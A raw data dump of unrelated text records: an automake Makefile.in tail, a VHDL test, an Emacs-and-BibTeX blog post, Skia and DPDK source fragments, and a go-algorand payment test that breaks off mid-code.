@AS@\nAUTOCONF = @AUTOCONF@\nAUTOHEADER = @AUTOHEADER@\nAUTOMAKE = @AUTOMAKE@\nAWK = @AWK@\nCC = @CC@\nCCDEPMODE = @CCDEPMODE@\nCFLAGS = @CFLAGS@\nCPP = @CPP@\nCPPFLAGS = @CPPFLAGS@\nCXX = @CXX@\nCXXCPP = @CXXCPP@\nCXXDEPMODE = @CXXDEPMODE@\nCXXFLAGS = @CXXFLAGS@\nCYGPATH_W = @CYGPATH_W@\nDEFS = @DEFS@\nDEPDIR = @DEPDIR@\nDLLTOOL = @DLLTOOL@\nECHO = @ECHO@\nECHO_C = @ECHO_C@\nECHO_N = @ECHO_N@\nECHO_T = @ECHO_T@\nEGREP = @EGREP@\nEXEEXT = @EXEEXT@\nF77 = @F77@\nFFLAGS = @FFLAGS@\nINSTALL_DATA = @INSTALL_DATA@\nINSTALL_PROGRAM = @INSTALL_PROGRAM@\nINSTALL_SCRIPT = @INSTALL_SCRIPT@\nINSTALL_STRIP_PROGRAM = @INSTALL_STRIP_PROGRAM@\nLDFLAGS = @LDFLAGS@\nLIBOBJS = @LIBOBJS@\nLIBS = @LIBS@\nLIBTOOL = @LIBTOOL@\nLIBVERSION = @LIBVERSION@\nLN_S = @LN_S@\nLTLIBOBJS = @LTLIBOBJS@\nMAKEINFO = @MAKEINFO@\nOBJDUMP = @OBJDUMP@\nOBJEXT = @OBJEXT@\nPACKAGE = @PACKAGE@\nPACKAGE_BUGREPORT = @PACKAGE_BUGREPORT@\nPACKAGE_NAME = @PACKAGE_NAME@\nPACKAGE_STRING = @PACKAGE_STRING@\nPACKAGE_TARNAME = @PACKAGE_TARNAME@\nPACKAGE_VERSION = @PACKAGE_VERSION@\nPATH_SEPARATOR = @PATH_SEPARATOR@\nRANLIB = @RANLIB@\nSET_MAKE = @SET_MAKE@\nSHELL = @SHELL@\nSTRIP = @STRIP@\nVERSION = @VERSION@\nac_ct_AR = @ac_ct_AR@\nac_ct_AS = @ac_ct_AS@\nac_ct_CC = @ac_ct_CC@\nac_ct_CXX = @ac_ct_CXX@\nac_ct_DLLTOOL = @ac_ct_DLLTOOL@\nac_ct_F77 = @ac_ct_F77@\nac_ct_OBJDUMP = @ac_ct_OBJDUMP@\nac_ct_RANLIB = @ac_ct_RANLIB@\nac_ct_STRIP = @ac_ct_STRIP@\nam__fastdepCC_FALSE = @am__fastdepCC_FALSE@\nam__fastdepCC_TRUE = @am__fastdepCC_TRUE@\nam__fastdepCXX_FALSE = @am__fastdepCXX_FALSE@\nam__fastdepCXX_TRUE = @am__fastdepCXX_TRUE@\nam__include = @am__include@\nam__leading_dot = @am__leading_dot@\nam__quote = @am__quote@\nbindir = @bindir@\nbuild = @build@\nbuild_alias = @build_alias@\nbuild_cpu = @build_cpu@\nbuild_os = @build_os@\nbuild_vendor = @build_vendor@\ndatadir = @datadir@\nexec_prefix = @exec_prefix@\nhost = @host@\nhost_alias = @host_alias@\nhost_cpu = @host_cpu@\nhost_os = @host_os@\nhost_vendor = @host_vendor@\nincludedir = @includedir@\ninfodir = @infodir@\ninstall_sh = @install_sh@\nlibdir = @libdir@\nlibexecdir = @libexecdir@\nlocalstatedir = @localstatedir@\nmandir = @mandir@\nmkdir_p = @mkdir_p@\noldincludedir = @oldincludedir@\nprefix = @prefix@\nprogram_transform_name = @program_transform_name@\nsbindir = @sbindir@\nsharedstatedir = @sharedstatedir@\nsysconfdir = @sysconfdir@\ntarget_alias = @target_alias@\nlibini_includedir = $(includedir)\nlibini_include_HEADERS = libini.h\nEXTRA_DIST = config.h\nall: config.h\n\t$(MAKE) $(AM_MAKEFLAGS) all-am\n\n.SUFFIXES:\n$(srcdir)/Makefile.in: $(srcdir)/Makefile.am $(am__configure_deps)\n\t@for dep in $?; do \\\n\t case '$(am__configure_deps)' in \\\n\t *$$dep*) \\\n\t cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh \\\n\t\t&& exit 0; \\\n\t exit 1;; \\\n\t esac; \\\n\tdone; \\\n\techo ' cd $(top_srcdir) && $(AUTOMAKE) --foreign include/Makefile'; \\\n\tcd $(top_srcdir) && \\\n\t $(AUTOMAKE) --foreign include/Makefile\n.PRECIOUS: Makefile\nMakefile: $(srcdir)/Makefile.in $(top_builddir)/config.status\n\t@case '$?' in \\\n\t *config.status*) \\\n\t cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh;; \\\n\t *) \\\n\t echo ' cd $(top_builddir) && $(SHELL) ./config.status $(subdir)/$@ $(am__depfiles_maybe)'; \\\n\t cd $(top_builddir) && $(SHELL) ./config.status $(subdir)/$@ $(am__depfiles_maybe);; \\\n\tesac;\n\n$(top_builddir)/config.status: $(top_srcdir)/configure $(CONFIG_STATUS_DEPENDENCIES)\n\tcd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh\n\n$(top_srcdir)/configure: $(am__configure_deps)\n\tcd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh\n$(ACLOCAL_M4): $(am__aclocal_m4_deps)\n\tcd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh\n\nconfig.h: stamp-h1\n\t@if test ! -f $@; then \\\n\t rm -f stamp-h1; \\\n\t $(MAKE) stamp-h1; \\\n\telse :; fi\n\nstamp-h1: $(srcdir)/config.h.in $(top_builddir)/config.status\n\t@rm -f stamp-h1\n\tcd $(top_builddir) && $(SHELL) ./config.status include/config.h\n$(srcdir)/config.h.in: $(am__configure_deps) \n\tcd $(top_srcdir) && $(AUTOHEADER)\n\trm -f stamp-h1\n\ttouch $@\n\ndistclean-hdr:\n\t-rm -f config.h stamp-h1\n\nmostlyclean-libtool:\n\t-rm -f *.lo\n\nclean-libtool:\n\t-rm -rf .libs _libs\n\ndistclean-libtool:\n\t-rm -f libtool\nuninstall-info-am:\ninstall-libini_includeHEADERS: $(libini_include_HEADERS)\n\t@$(NORMAL_INSTALL)\n\ttest -z \"$(libini_includedir)\" || $(mkdir_p) \"$(DESTDIR)$(libini_includedir)\"\n\t@list='$(libini_include_HEADERS)'; for p in $$list; do \\\n\t if test -f \"$$p\"; then d=; else d=\"$(srcdir)/\"; fi; \\\n\t f=\"`echo $$p | sed -e 's|^.*/||'`\"; \\\n\t echo \" $(libini_includeHEADERS_INSTALL) '$$d$$p' '$(DESTDIR)$(libini_includedir)/$$f'\"; \\\n\t $(libini_includeHEADERS_INSTALL) \"$$d$$p\" \"$(DESTDIR)$(libini_includedir)/$$f\"; \\\n\tdone\n\nuninstall-libini_includeHEADERS:\n\t@$(NORMAL_UNINSTALL)\n\t@list='$(libini_include_HEADERS)'; for p in $$list; do \\\n\t f=\"`echo $$p | sed -e 's|^.*/||'`\"; \\\n\t echo \" rm -f '$(DESTDIR)$(libini_includedir)/$$f'\"; \\\n\t rm -f \"$(DESTDIR)$(libini_includedir)/$$f\"; \\\n\tdone\n\nID: $(HEADERS) $(SOURCES) $(LISP) $(TAGS_FILES)\n\tlist='$(SOURCES) $(HEADERS) $(LISP) $(TAGS_FILES)'; \\\n\tunique=`for i in $$list; do \\\n\t if test -f \"$$i\"; then echo $$i; else echo $(srcdir)/$$i; fi; \\\n\t done | \\\n\t $(AWK) ' { files[$$0] = 1; } \\\n\t END { for (i in files) print i; }'`; \\\n\tmkid -fID $$unique\ntags: TAGS\n\nTAGS: $(HEADERS) $(SOURCES) config.h.in $(TAGS_DEPENDENCIES) \\\n\t\t$(TAGS_FILES) $(LISP)\n\ttags=; \\\n\there=`pwd`; \\\n\tlist='$(SOURCES) $(HEADERS) config.h.in $(LISP) $(TAGS_FILES)'; \\\n\tunique=`for i in $$list; do \\\n\t if test -f \"$$i\"; then echo $$i; else echo $(srcdir)/$$i; fi; \\\n\t done | \\\n\t $(AWK) ' { files[$$0] = 1; } \\\n\t END { for (i in files) print i; }'`; \\\n\tif test -z \"$(ETAGS_ARGS)$$tags$$unique\"; then :; else \\\n\t test -z \"$$unique\" && unique=$$empty_fix; \\\n\t $(ETAGS) $(ETAGSFLAGS) $(AM_ETAGSFLAGS) $(ETAGS_ARGS) \\\n\t $$tags $$unique; \\\n\tfi\nctags: CTAGS\nCTAGS: $(HEADERS) $(SOURCES) config.h.in $(TAGS_DEPENDENCIES) \\\n\t\t$(TAGS_FILES) $(LISP)\n\ttags=; \\\n\there=`pwd`; \\\n\tlist='$(SOURCES) $(HEADERS) config.h.in $(LISP) $(TAGS_FILES)'; \\\n\tunique=`for i in $$list; do \\\n\t if test -f \"$$i\"; then echo $$i; else echo $(srcdir)/$$i; fi; \\\n\t done | \\\n\t $(AWK) ' { files[$$0] = 1; } \\\n\t END { for (i in files) print i; }'`; \\\n\ttest -z \"$(CTAGS_ARGS)$$tags$$unique\" \\\n\t || $(CTAGS) $(CTAGSFLAGS) $(AM_CTAGSFLAGS) $(CTAGS_ARGS) \\\n\t $$tags $$unique\n\nGTAGS:\n\there=`$(am__cd) $(top_builddir) && pwd` \\\n\t && cd $(top_srcdir) \\\n\t && gtags -i $(GTAGS_ARGS) $$here\n\ndistclean-tags:\n\t-rm -f TAGS ID GTAGS GRTAGS GSYMS GPATH tags\n\ndistdir: $(DISTFILES)\n\t@srcdirstrip=`echo \"$(srcdir)\" | sed 's|.|.|g'`; \\\n\ttopsrcdirstrip=`echo \"$(top_srcdir)\" | sed 's|.|.|g'`; \\\n\tlist='$(DISTFILES)'; for file in $$list; do \\\n\t case $$file in \\\n\t $(srcdir)/*) file=`echo \"$$file\" | sed \"s|^$$srcdirstrip/||\"`;; \\\n\t $(top_srcdir)/*) file=`echo \"$$file\" | sed \"s|^$$topsrcdirstrip/|$(top_builddir)/|\"`;; \\\n\t esac; \\\n\t if test -f $$file || test -d $$file; then d=.; else d=$(srcdir); fi; \\\n\t dir=`echo \"$$file\" | sed -e 's,/[^/]*$$,,'`; \\\n\t if test \"$$dir\" != \"$$file\" && test \"$$dir\" != \".\"; then \\\n\t dir=\"/$$dir\"; \\\n\t $(mkdir_p) \"$(distdir)$$dir\"; \\\n\t else \\\n\t dir=''; \\\n\t fi; \\\n\t if test -d $$d/$$file; then \\\n\t if test -d $(srcdir)/$$file && test $$d != $(srcdir); then \\\n\t cp -pR $(srcdir)/$$file $(distdir)$$dir || exit 1; \\\n\t fi; \\\n\t cp -pR $$d/$$file $(distdir)$$dir || exit 1; \\\n\t else \\\n\t test -f $(distdir)/$$file \\\n\t || cp -p $$d/$$file $(distdir)/$$file \\\n\t || exit 1; \\\n\t fi; \\\n\tdone\ncheck-am: all-am\ncheck: check-am\nall-am: Makefile $(HEADERS) config.h\ninstalldirs:\n\tfor dir in \"$(DESTDIR)$(libini_includedir)\"; do \\\n\t test -z \"$$dir\" || $(mkdir_p) \"$$dir\"; \\\n\tdone\ninstall: install-am\ninstall-exec: install-exec-am\ninstall-data: install-data-am\nuninstall: uninstall-am\n\ninstall-am: all-am\n\t@$(MAKE) $(AM_MAKEFLAGS) install-exec-am install-data-am\n\ninstallcheck: installcheck-am\ninstall-strip:\n\t$(MAKE) $(AM_MAKEFLAGS) INSTALL_PROGRAM=\"$(INSTALL_STRIP_PROGRAM)\" \\\n\t install_sh_PROGRAM=\"$(INSTALL_STRIP_PROGRAM)\" INSTALL_STRIP_FLAG=-s \\\n\t `test -z '$(STRIP)' || \\\n\t echo \"INSTALL_PROGRAM_ENV=STRIPPROG='$(STRIP)'\"` install\nmostlyclean-generic:\n\nclean-generic:\n\ndistclean-generic:\n\t-rm -f $(CONFIG_CLEAN_FILES)\n\nmaintainer-clean-generic:\n\t@echo \"This command is intended for maintainers to use\"\n\t@echo \"it deletes files that may require special tools to rebuild.\"\nclean: clean-am\n\nclean-am: clean-generic clean-libtool mostlyclean-am\n\ndistclean: distclean-am\n\t-rm -f Makefile\ndistclean-am: clean-am distclean-generic distclean-hdr \\\n\tdistclean-libtool distclean-tags\n\ndvi: dvi-am\n\ndvi-am:\n\nhtml: html-am\n\ninfo: info-am\n\ninfo-am:\n\ninstall-data-am: install-libini_includeHEADERS\n\ninstall-exec-am:\n\ninstall-info: install-info-am\n\ninstall-man:\n\ninstallcheck-am:\n\nmaintainer-clean: maintainer-clean-am\n\t-rm -f Makefile\nmaintainer-clean-am: distclean-am maintainer-clean-generic\n\nmostlyclean: mostlyclean-am\n\nmostlyclean-am: mostlyclean-generic mostlyclean-libtool\n\npdf: pdf-am\n\npdf-am:\n\nps: ps-am\n\nps-am:\n\nuninstall-am: uninstall-info-am uninstall-libini_includeHEADERS\n\n.PHONY: CTAGS GTAGS all all-am check check-am clean clean-generic \\\n\tclean-libtool ctags distclean distclean-generic distclean-hdr \\\n\tdistclean-libtool distclean-tags distdir dvi dvi-am html \\\n\thtml-am info info-am install install-am install-data \\\n\tinstall-data-am install-exec install-exec-am install-info \\\n\tinstall-info-am install-libini_includeHEADERS install-man \\\n\tinstall-strip installcheck installcheck-am installdirs \\\n\tmaintainer-clean maintainer-clean-generic mostlyclean \\\n\tmostlyclean-generic mostlyclean-libtool pdf pdf-am ps ps-am \\\n\ttags uninstall uninstall-am uninstall-info-am \\\n\tuninstall-libini_includeHEADERS\n\n# Tell versions [3.59,3.63) of GNU make to not export all variables.\n# Otherwise a system limit (for SysV at least) may be exceeded.\n.NOEXPORT:\n"} {"text": "entity signal9 is\nend entity;\n\nlibrary ieee;\nuse ieee.std_logic_1164.all;\nuse ieee.numeric_std.all;\n\narchitecture test of signal9 is\n signal vec : std_logic_vector(7 downto 0);\nbegin\n\n assign_p: vec <= X\"52\";\n\n count_p: process is\n variable ctr : unsigned(7 downto 0) := X\"00\";\n begin\n wait for 1 ns;\n loop\n ctr := ctr + 1;\n exit when vec = std_logic_vector(ctr);\n end loop;\n loop\n ctr := ctr + 1;\n exit when unsigned(vec) = ctr;\n end loop;\n wait;\n end process;\n\nend architecture;\n"} {"text": "\n\n\n\nHow to use Emacs to keep track of your bibliography and notes:\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n

How to use Emacs to keep track of your bibliography and notes:

\n

\nanatomy of an Emacs hack\n

\n\n

\nApril 17th, 2007 -\nhttp://sachachua.com/blog/p/4611\n

\n\n

\nKeep your records in BibTeX, which is a text-based tool for\n keeping track of bibliographies. BibTeX really shines when you use it\n with TeX or LaTeX because you can cite papers by typing something like\n “\\cite{chua07}”. It will automatically publish your bibliography in\n any of the popular formats, sorting it however you want and including\n only the papers you actually referenced. Major paper libraries like\n the ACM Digital Library can export bibliographic records as BiBTeX.\n You can also use bibtex-mode to help you create records. Assign short,\n memorable keys to the BibTeX records. I usually use the first author's\n last name together with the year of publication, with a few more\n characters if I need to disambiguate.\n

\n\n

\nYou can keep your notes about papers in whatever format you want. Just\n add a line like “\\cite{chua07a}” to make it easier to paste the\n citation. I put my notes into a fortune file (chunks delimited by % on\n a line by itself) because whenever I get writer's block, I like\n retrieving random notes using the fortune command. I usually highlight\n selections from the PDFs, paste them into my Emacs buffer, and add the\n \\cite… note. I keep exact quotations so that I can paraphrase them\n any way I want when I write the document. Sometimes I'll add comments,\n which I visually distinguish from the quote so that I don't get\n confused. You can also add keywords to your notes and use M-x\n occur or grep to find matching quotes.\n

\n\n

\nWhen it's time to work on your paper, keep your citation notes close\n to the statements as you paraphrase them for your paper. The best way\n to take advantage of the data you have is to use LaTeX, a powerful\n typesetting system for scientific papers and books. It's well worth\n learning and it's the standard in many scientific circles. Even if you\n use OpenOffice.org or some other word processor, though, you can still\n take advantage of your notes: just make sure you copy the citations\n into your bibliography.\n

\n\n

\n-—\n

\n\n

\nSo that's the basic way to do it. Of course, I've been accumulating\n various Emacs hacks for managing my bibliography, and they're all in\n

\n\n

\n../emacs/research-config.el.\n

\n\n

\nThe first thing I noticed was that I was typing \\cite{someid} all the\n time. Hmm. There must be a way I could just take that information from\n my BibTeX file… So I wrote a function that allowed me to mark a\n BibTeX record as the current paper I was reading.\n

\n\n
\n(defvar sacha/research/quote-default \"\"\n  \"Stores the BibTeX key for the paper I'm currently reading.\")\n(defadvice bibtex-clean-entry (after sacha activate)\n  \"Set default key based on the current record.\"\n  (setq sacha/research/quote-default (bibtex-key-in-head))\n  (set-register ?a (format \"\\n\\\\cite{%s}\\n%%\" sacha/research/quote-default))\n  (set-register ?b sacha/research/quote-default))\n
\n\n

\nOkay. That meant I could just insert the register with C-x r i a. This\n wasn't really that much of an improvement, so I thought about making a\n function that pasted the text, added the citation, and added the %\n that separates entries in fortune files.\n

\n\n
\n(defvar sacha/research/quote-file \"/home/sacha/notebook/research/quotes\"\n  \"File with my research notes.\")\n(defun sacha/research/quote ()\n  \"Paste the quote into `sacha/research/quote-file'.\"\n  (interactive)\n  (with-current-buffer (find-file-noselect sacha/research/quote-file)\n     (goto-char (point-max))\n     (yank)\n     (unless (bolp) (insert \"\\n\"))\n     (insert \"\\\\cite{\" sacha/research/quote-default \"}\\n%\\n\")))\n
\n\n

\nI have lots of other functions to keep track of read entries (moving\n the papers into a separate folder!), count papers read and remaining\n (good for morale when you see the numbers decreasing, and for a while\n I was publishing the numbers on my blog!) and even quickly browse and\n tag quotes. =) You can check out\n../emacs/research-config.el\nfor\n more inspiration.\n

\n\n

\nAnd yes, this is what I do when I want to procrastinate working on my\n thesis…\n

\n\n

\nRandom Emacs symbol: memory-signal-data – Variable: Precomputed\n`signal' argument for memory-full error.\n

\n
\n\n\n\n"} {"text": "\n\n \n \n \n \n \n \n"} {"text": "\n/*\n * Copyright 2006 The Android Open Source Project\n *\n * Use of this source code is governed by a BSD-style license that can be\n * found in the LICENSE file.\n */\n\n\n#ifndef SkApplication_DEFINED\n#define SkApplication_DEFINED\n\nclass SkOSWindow;\n\nextern SkOSWindow* create_sk_window(void* hwnd, int argc, char** argv);\nextern void application_init();\nextern void application_term();\n\n#ifdef SK_BUILD_FOR_IOS\nenum IOS_launch_type {\n kError_iOSLaunchType = -1,\n kTool_iOSLaunchType = 0,\n kApplication__iOSLaunchType = 1\n};\n\nextern IOS_launch_type set_cmd_line_args(int argc, char *argv[],\n const char* resourceDir);\n#endif\n\n#endif // SkApplication_DEFINED\n"} {"text": "/*-\n * BSD LICENSE\n *\n * Copyright(c) 2010-2014 Intel Corporation. All rights reserved.\n * All rights reserved.\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n *\n * * Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n * * Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in\n * the documentation and/or other materials provided with the\n * distribution.\n * * Neither the name of Intel Corporation nor the names of its\n * contributors may be used to endorse or promote products derived\n * from this software without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n * \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n */\n\n#include \"acl_run_sse.h\"\n\nint\nrte_acl_classify_sse(const struct rte_acl_ctx *ctx, const uint8_t **data,\n\tuint32_t *results, uint32_t num, uint32_t categories)\n{\n\tif (likely(num >= MAX_SEARCHES_SSE8))\n\t\treturn search_sse_8(ctx, data, results, num, categories);\n\telse if (num >= MAX_SEARCHES_SSE4)\n\t\treturn search_sse_4(ctx, data, results, num, categories);\n\telse\n\t\treturn rte_acl_classify_scalar(ctx, data, results, num,\n\t\t\tcategories);\n}\n"} {"text": "// Copyright (C) 2019-2020 Algorand, Inc.\n// This file is part of go-algorand\n//\n// go-algorand is free software: you can redistribute it and/or modify\n// it under the terms of the GNU Affero General Public License as\n// published by the Free Software Foundation, either version 3 of the\n// License, or (at your option) any later version.\n//\n// go-algorand is distributed in the hope that it will be useful,\n// but WITHOUT ANY WARRANTY; without even the implied warranty of\n// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n// GNU Affero General Public License for more details.\n//\n// You should have received a copy of the GNU Affero General Public License\n// along with go-algorand. If not, see .\n\npackage apply\n\nimport (\n\t\"math/rand\"\n\t\"testing\"\n\n\t\"github.com/stretchr/testify/require\"\n\n\t\"github.com/algorand/go-algorand/config\"\n\t\"github.com/algorand/go-algorand/crypto\"\n\t\"github.com/algorand/go-algorand/data/basics\"\n\t\"github.com/algorand/go-algorand/data/transactions\"\n\t\"github.com/algorand/go-algorand/protocol\"\n)\n\nvar poolAddr = basics.Address{0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff}\n\nvar spec = transactions.SpecialAddresses{\n\tFeeSink: feeSink,\n\tRewardsPool: poolAddr,\n}\n\nfunc keypair() *crypto.SignatureSecrets {\n\tvar seed crypto.Seed\n\tcrypto.RandBytes(seed[:])\n\ts := crypto.GenerateSignatureSecrets(seed)\n\treturn s\n}\n\nfunc TestAlgosEncoding(t *testing.T) {\n\tvar a basics.MicroAlgos\n\tvar b basics.MicroAlgos\n\tvar i uint64\n\n\ta.Raw = 222233333\n\terr := protocol.Decode(protocol.Encode(&a), &b)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\trequire.Equal(t, a, b)\n\n\ta.Raw = 12345678\n\terr = protocol.DecodeReflect(protocol.Encode(a), &i)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\trequire.Equal(t, a.Raw, i)\n\n\ti = 87654321\n\terr = protocol.Decode(protocol.EncodeReflect(i), &a)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\trequire.Equal(t, a.Raw, i)\n\n\tx := true\n\terr = protocol.Decode(protocol.EncodeReflect(x), &a)\n\tif err == nil {\n\t\tpanic(\"decode of bool into MicroAlgos succeeded\")\n\t}\n}\n\ntype mockBalances struct {\n\tprotocol.ConsensusVersion\n}\n\nfunc (balances mockBalances) Round() basics.Round {\n\treturn basics.Round(8675309)\n}\n\nfunc (balances mockBalances) PutWithCreatable(basics.BalanceRecord, *basics.CreatableLocator, *basics.CreatableLocator) error {\n\treturn nil\n}\n\nfunc (balances mockBalances) Get(basics.Address, bool) (basics.BalanceRecord, error) {\n\treturn basics.BalanceRecord{}, nil\n}\n\nfunc (balances mockBalances) GetCreator(idx basics.CreatableIndex, ctype basics.CreatableType) (basics.Address, bool, error) {\n\treturn basics.Address{}, true, nil\n}\n\nfunc (balances mockBalances) Put(basics.BalanceRecord) error {\n\treturn nil\n}\n\nfunc (balances mockBalances) Move(src, dst basics.Address, amount basics.MicroAlgos, srcRewards, dstRewards *basics.MicroAlgos) error {\n\treturn nil\n}\n\nfunc (balances mockBalances) ConsensusParams() config.ConsensusParams {\n\treturn config.Consensus[balances.ConsensusVersion]\n}\n\nfunc TestPaymentApply(t *testing.T) {\n\tmockBalV0 := mockBalances{protocol.ConsensusCurrentVersion}\n\n\tsecretSrc := keypair()\n\tsrc := basics.Address(secretSrc.SignatureVerifier)\n\n\tsecretDst := keypair()\n\tdst := basics.Address(secretDst.SignatureVerifier)\n\n\ttx := transactions.Transaction{\n\t\tType: protocol.PaymentTx,\n\t\tHeader: transactions.Header{\n\t\t\tSender: src,\n\t\t\tFee: basics.MicroAlgos{Raw: 1},\n\t\t\tFirstValid: basics.Round(100),\n\t\t\tLastValid: basics.Round(1000),\n\t\t},\n\t\tPaymentTxnFields: transactions.PaymentTxnFields{\n\t\t\tReceiver: dst,\n\t\t\tAmount: basics.MicroAlgos{Raw: uint64(50)},\n\t\t},\n\t}\n\tvar ad transactions.ApplyData\n\terr := Payment(tx.PaymentTxnFields, tx.Header, mockBalV0, transactions.SpecialAddresses{FeeSink: feeSink}, &ad)\n\trequire.NoError(t, err)\n}\n\nfunc TestCheckSpender(t *testing.T) {\n\tmockBalV0 := mockBalances{protocol.ConsensusCurrentVersion}\n\tmockBalV7 := mockBalances{protocol.ConsensusV7}\n\n\tsecretSrc := keypair()\n\tsrc := basics.Address(secretSrc.SignatureVerifier)\n\n\tsecretDst := keypair()\n\tdst := basics.Address(secretDst.SignatureVerifier)\n\n\ttx := transactions.Transaction{\n\t\tType: protocol.PaymentTx,\n\t\tHeader: transactions.Header{\n\t\t\tSender: src,\n\t\t\tFee: basics.MicroAlgos{Raw: 1},\n\t\t\tFirstValid: basics.Round(100),\n\t\t\tLastValid: basics.Round(1000),\n\t\t},\n\t\tPaymentTxnFields: transactions.PaymentTxnFields{\n\t\t\tReceiver: dst,\n\t\t\tAmount: basics.MicroAlgos{Raw: uint64(50)},\n\t\t},\n\t}\n\n\ttx.Sender = basics.Address(feeSink)\n\trequire.Error(t, checkSpender(tx.PaymentTxnFields, tx.Header, spec, mockBalV0.ConsensusParams()))\n\n\tpoolAddr := basics.Address(poolAddr)\n\ttx.Receiver = poolAddr\n\trequire.NoError(t, checkSpender(tx.PaymentTxnFields, tx.Header, spec, mockBalV0.ConsensusParams()))\n\n\ttx.CloseRemainderTo = poolAddr\n\trequire.Error(t, checkSpender(tx.PaymentTxnFields, tx.Header, spec, mockBalV0.ConsensusParams()))\n\trequire.Error(t, checkSpender(tx.PaymentTxnFields, tx.Header, spec, mockBalV7.ConsensusParams()))\n\n\ttx.Sender = src\n\trequire.NoError(t, checkSpender(tx.PaymentTxnFields, tx.Header, spec, mockBalV7.ConsensusParams()))\n}\n\nfunc TestPaymentValidation(t *testing.T) {\n\tpayments, _, _, _ := generateTestObjects(100, 50)\n\tgenHash := crypto.Digest{0x42}\n\tfor i, txn := range payments {\n\t\ttxn.GenesisHash = genHash\n\t\tpayments[i] = txn\n\t}\n\ttc := transactions.ExplicitTxnContext{\n\t\tProto: config.Consensus[protocol.ConsensusCurrentVersion],\n\t\tGenHash: genHash,\n\t}\n\tfor _, txn := range payments {\n\t\t// Lifetime window\n\t\ttc.ExplicitRound = txn.First() + 1\n\t\tif txn.Alive(tc) != nil {\n\t\t\tt.Errorf(\"transaction not alive during lifetime %v\", txn)\n\t\t}\n\n\t\ttc.ExplicitRound = txn.First()\n\t\tif txn.Alive(tc) != nil {\n\t\t\tt.Errorf(\"transaction not alive at issuance %v\", txn)\n\t\t}\n\n\t\ttc.ExplicitRound = txn.Last()\n\t\tif txn.Alive(tc) != nil {\n\t\t\tt.Errorf(\"transaction not alive at expiry %v\", txn)\n\t\t}\n\n\t\ttc.ExplicitRound = txn.First() - 1\n\t\tif txn.Alive(tc) == nil {\n\t\t\tt.Errorf(\"premature transaction alive %v\", txn)\n\t\t}\n\n\t\ttc.ExplicitRound = txn.Last() + 1\n\t\tif txn.Alive(tc) == nil {\n\t\t\tt.Errorf(\"expired transaction alive %v\", txn)\n\t\t}\n\n\t\t// Make a copy of txn, change some fields, be sure the TXID changes. This is not exhaustive.\n\t\tvar txn2 transactions.Transaction\n\t\ttxn2 = txn\n\t\ttxn2.Note = []byte{42}\n\t\tif txn2.ID() == txn.ID() {\n\t\t\tt.Errorf(\"txid does not depend on note\")\n\t\t}\n\t\ttxn2 = txn\n\t\ttxn2.Amount.Raw++\n\t\tif txn2.ID() == txn.ID() {\n\t\t\tt.Errorf(\"txid does not depend on amount\")\n\t\t}\n\t\ttxn2 = txn\n\t\ttxn2.Fee.Raw++\n\t\tif txn2.ID() == txn.ID() {\n\t\t\tt.Errorf(\"txid does not depend on fee\")\n\t\t}\n\t\ttxn2 = txn\n\t\ttxn2.LastValid++\n\t\tif txn2.ID() == txn.ID() {\n\t\t\tt.Errorf(\"txid does not depend on lastvalid\")\n\t\t}\n\n\t\t// Check malformed transactions\n\t\tlargeWindow := txn\n\t\tlargeWindow.LastValid += basics.Round(tc.Proto.MaxTxnLife)\n\t\tif largeWindow.WellFormed(spec, tc.Proto) == nil {\n\t\t\tt.Errorf(\"transaction with large window %#v verified incorrectly\", largeWindow)\n\t\t}\n\n\t\tbadWindow := txn\n\t\tbadWindow.LastValid = badWindow.FirstValid - 1\n\t\tif badWindow.WellFormed(spec, tc.Proto) == nil {\n\t\t\tt.Errorf(\"transaction with bad window %#v verified incorrectly\", badWindow)\n\t\t}\n\n\t\tbadFee := txn\n\t\tbadFee.Fee = basics.MicroAlgos{}\n\t\tif badFee.WellFormed(spec, tc.Proto) == nil {\n\t\t\tt.Errorf(\"transaction with no fee %#v verified incorrectly\", badFee)\n\t\t}\n\t}\n}\n\nfunc TestPaymentSelfClose(t *testing.T) {\n\tsecretSrc := keypair()\n\tsrc := basics.Address(secretSrc.SignatureVerifier)\n\n\tsecretDst := keypair()\n\tdst := basics.Address(secretDst.SignatureVerifier)\n\n\ttx := transactions.Transaction{\n\t\tType: protocol.PaymentTx,\n\t\tHeader: transactions.Header{\n\t\t\tSender: src,\n\t\t\tFee: basics.MicroAlgos{Raw: config.Consensus[protocol.ConsensusCurrentVersion].MinTxnFee},\n\t\t\tFirstValid: basics.Round(100),\n\t\t\tLastValid: 